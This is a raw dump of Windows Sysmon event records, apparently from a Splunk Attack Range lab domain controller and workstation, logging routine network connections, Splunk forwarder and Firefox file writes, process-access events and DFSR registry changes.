354300x8000000000000000193626Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:22.734{2E1864BB-E13C-6299-0B00-000000005F02}636C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local56332-truefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local389ldap 354300x8000000000000000193625Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:22.733{2E1864BB-E13E-6299-1000-000000005F02}364C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local56332-truefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local389ldap 23542300x8000000000000000193624Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:24.236{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26E93C3C1301BD9E91D0EEF95F946286,SHA256=F9DBAA2C086F6FD455FE074A685B2D57EDB964D96E36937F4FC450DEA1024FBE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193631Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:25.353{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2266479904A58A2E1CD490A6325EA9AB,SHA256=4E32421F4FA7413A8A7B2B7AF904AF55B531DA4754A343D310F3B9282BBE70CC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000193630Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:22.849{2E1864BB-E13A-6299-0100-000000005F02}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local56334-truefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local445microsoft-ds 354300x8000000000000000193629Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:22.849{2E1864BB-E13A-6299-0100-000000005F02}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local56334-truefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local445microsoft-ds 354300x8000000000000000193628Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:22.762{2E1864BB-E13C-6299-0B00-000000005F02}636C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56333-false10.0.1.14win-dc-ct-attack-range-304.attackrange.local389ldap 354300x8000000000000000193627Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:22.762{2E1864BB-E13E-6299-1000-000000005F02}364C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56333-false10.0.1.14win-dc-ct-attack-range-304.attackrange.local389ldap 23542300x800000000000000043762Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:25.499{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=787206796E694B0F14A188A5E080347A,SHA256=A315A929313B517A90BC6A9A528AB3F514BEB53D15991B92091BE20919FB64AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193632Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:26.371{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB0B6C57BA8AA68FF704F03756498433,SHA256=1B928C42002AC5BC4D381F83E99462595A7D740F0DAA9F013EB8B0C6365AF64E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043763Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:26.593{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20BD3A4A31066C136D246AD2DF3136E2,SHA256=58235EB352E33893D73D1DF523513863D90F0C25460BE9EAE83D1D9AFAAB9EB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193633Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:27.509{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1CA68362DFC8B008A927AD01916464E,SHA256=921A63D303217013DD2F12CBC3F7F597421CB3AAC51CE6A6D4AF7193E9E41C68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043764Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:27.687{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F83E220ADA8A5944DD841DC304B4D86,SHA256=57A23D746BEE882B1EB2C01AA06DBECEF1483B9C6A40AEA5F956D10BD18A71C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193635Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:28.540{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=837659B3373B1A3757C2A5F1E3DA873D,SHA256=F66CF983D5E80952A8B919B017EE6B4317877208F35E76601D2A4165743E9B9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043765Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:28.781{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C894FB12DA81BE02883379097EDD450C,SHA256=72C48E964D66A4E958C8519AA4D21F5B866C59C6775A0CC8B6B2259A262AAC53,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000193634Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:26.648{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56335-false10.0.1.12-8000- 23542300x8000000000000000193636Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:29.656{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1C9348677005026502B46591CB3A65D,SHA256=44D8CB04ED7A559F0BDA06922378D3DD4601B76D37A2C103DFE9148741C93D55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043767Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:29.874{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E71517C459C25FAE12D43382809180E,SHA256=977CB228C32BEC24B8E71638F6A5B6953CF2DC77366A8A5815151F236D075E26,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000043766Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:26.736{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52313-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000043768Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:30.968{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60BA96F487CE342112170BFD788E7140,SHA256=431EB6B936F33ADC0E7E8B609C0535F2FACFD00F4881BEEC05346C2169B0F623,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193637Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:30.756{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=174D5A5487E0D23E68D05B4ABFBE8927,SHA256=C4BA6CB41A2FB1DFE39AFE57E927BFCA8848C87A0F37C203A19204B8560A795D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193638Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:31.808{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36DBCB4BA408FF97085FE090893D8A5E,SHA256=B3E8451D19E23EEF4272BA9B4AC471E23CDD29A4AF913B9EB2A73E0800325E8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193639Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:32.840{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=508F7EFA0D1F23DD2C82E11CDD5EF70A,SHA256=3C5D3D9106127256550ED5C15940ED1D5FCD29289BC83D4E6AE5FFC081669357,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043769Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:32.062{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D49B2C2E7F479CB28ADEAA949C3DF43D,SHA256=48DF10F055A1EE14DDCA096505A0D78A9739E47E7712569AC56B79CDEFA1D7C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193641Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:33.888{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A60548EC3460E32DF650FBCCE3BA6EF,SHA256=66B3AE6F77CD8AC8B21B8786D8D646B65819505A11D7BD41C7761995C6805DB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043771Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:33.150{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C95ECF002362985698AAFD8EEF4FBE94,SHA256=3C17D9E51EA2101F494F34F7E8F75CE8D3DFE41587233D4D49138A2420A85ABF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043770Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:33.138{0A5DF930-E35C-6299-1E00-000000006002}1996NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-05821ca64e01051b6\channels\health\respondent-20220603103302-216MD5=1368864ED3964BDCAF310770CE48D2A5,SHA256=F4EE2B140FD43EB5772AE1FE5CF5CF61204868E3BB74D3908306C7C1A703C3E0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000193640Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:31.695{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56336-false10.0.1.12-8000- 23542300x8000000000000000193643Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:34.989{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D366C0DBE3FF51B8D3BC58ADF1D3480,SHA256=69406BEEBFBC072EDFC700F18E6BCA7C73BFA4D6750B51D8FE83FE0E747B3753,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193642Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:34.989{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C1A958DE75D1EBDD3B4BD27A9A9458AE,SHA256=BFCC7E012F2151A711F9DE59F113ED2747631C5BBE9F29134696229A1B0AFF68,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000043774Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:32.746{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52314-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000043773Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:34.243{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6599449A010151A001915DC26B70E180,SHA256=62B41A6FA8318B85F8DFA6C8C195509B342EE0B15F3FEEA2F048079FA82506C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043772Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:34.136{0A5DF930-E35C-6299-1E00-000000006002}1996NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-05821ca64e01051b6\channels\health\surveyor-20220603103300-217MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043775Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:35.339{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96810850CE5A2D629DD6E587E883FB69,SHA256=F37B796D920CDBA360CEC2342042292A17EF392CD723E43B69BA85F84727DF2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043776Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:36.432{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2BEA3568A068B4CBF02E1555DC7E11D,SHA256=3009152BBF4D91603CBE435A88A8302C5D42107D35CB5DC4100360044247C778,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193644Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:36.109{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58BD6421C82DB18EE42E97F86B5CF7FE,SHA256=5FCBC291CA71AF1156E4C8C9965E15A2F8978662FDBFF21F27A7319EF4E9F8F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043777Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:37.526{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=195E23DF6B2E2E160CCA9358118DB446,SHA256=2A188FFE7CAA60E62B73E5DCBA4FADD37CBC993A8877AC8CD412017CBAE40751,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000193648Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:37.993{2E1864BB-FA2C-6299-4D07-000000005F02}33763172C:\Windows\Explorer.EXE{2E1864BB-FA4D-6299-5F07-000000005F02}6532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+cf1e0|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF80036E68C48)|UNKNOWN(FFFF85B2AA2A5B68)|UNKNOWN(FFFF85B2AA2A5CE7)|UNKNOWN(FFFF85B2AA2A0371)|UNKNOWN(FFFF85B2AA2A1D3A)|UNKNOWN(FFFF85B2AA29FFF6)|UNKNOWN(FFFFF80036B7E503)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+d2a3b|C:\Windows\System32\SHELL32.dll+1197ca|C:\Windows\System32\SHCORE.dll+33fbd 10341000x8000000000000000193647Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:37.993{2E1864BB-FA2C-6299-4D07-000000005F02}33763172C:\Windows\Explorer.EXE{2E1864BB-FA4D-6299-5F07-000000005F02}6532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+cecc1|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF80036E68C48)|UNKNOWN(FFFF85B2AA2A5B68)|UNKNOWN(FFFF85B2AA2A5CE7)|UNKNOWN(FFFF85B2AA2A0371)|UNKNOWN(FFFF85B2AA2A1D3A)|UNKNOWN(FFFF85B2AA29FFF6)|UNKNOWN(FFFFF80036B7E503)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+d2a3b|C:\Windows\System32\SHELL32.dll+1197ca|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000193646Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:37.993{2E1864BB-FA4D-6299-5F07-000000005F02}6532ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFd429c8.TMPMD5=A303D473BA814FD6FAB43C1CB00819D2,SHA256=AA2A030E0B028A696C3F21587D451CD5CB68ED59621BA6CE0EF8E95415BF6D12,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193645Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:37.225{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF4B0DE817028F0BE74BA6882B377AB2,SHA256=E32E15756E1621AEA2B8852B4C1967EAE3D2AE1D2E11F0BA9D01250DC9459438,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043778Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:38.620{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F2249426F1C32928B4F47B95E61430C,SHA256=F156AE3127E4BA0D366A72B9E79B1243F74747F61CF7DFEF7425EBBA73E28E2D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000193653Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:38.926{2E1864BB-E13E-6299-0D00-000000005F02}9126544C:\Windows\system32\svchost.exe{2E1864BB-FA4D-6299-5F07-000000005F02}6532C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3d877|c:\windows\system32\rpcss.dll+29a97|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000193652Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:36.849{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56337-false10.0.1.12-8000- 23542300x8000000000000000193651Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:38.340{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C03D1DAADC76FD79DAC1880FC0FA77B,SHA256=CB93F160F3D75C5CB86CB74310AEFE9ECCBE55A64D3DD066B847B23941F1F79D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193650Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:38.208{2E1864BB-FA4D-6299-5F07-000000005F02}6532ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\or89gb4t.default-release\datareporting\glean\db\data.safe.binMD5=4C70BF4173DF2DDBFF215B34581C1E24,SHA256=78E2F103972B305111C15707119F6DBC613AF9A9B29DBC1C5539891573B039BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193649Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:38.024{2E1864BB-FA4D-6299-5F07-000000005F02}6532ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\or89gb4t.default-release\datareporting\aborted-session-pingMD5=2691F96671929D280965FC4B89DE088D,SHA256=EF542E0A9C3E146AF51D9840B63576A28131573B3151E9F78B2E1B785E2A5420,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043779Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:39.714{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C6A7DB0176795F1C94A66013BA56E85,SHA256=6F63E5F12039D7769B7DBBACA1917FD14D5BE363560926D544ECA9D66E5FDCCB,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000193659Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-SetValue2022-06-03 14:15:39.771{2E1864BB-E14E-6299-2F00-000000005F02}1280C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\76F93978-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_76F93978-0000-0000-0000-100000000000.XML 13241300x8000000000000000193658Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-SetValue2022-06-03 14:15:39.771{2E1864BB-E14E-6299-2F00-000000005F02}1280C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\634CD7B3-42FA-429E-8949-85C1FE2E997C\Config SourceDWORD (0x00000001) 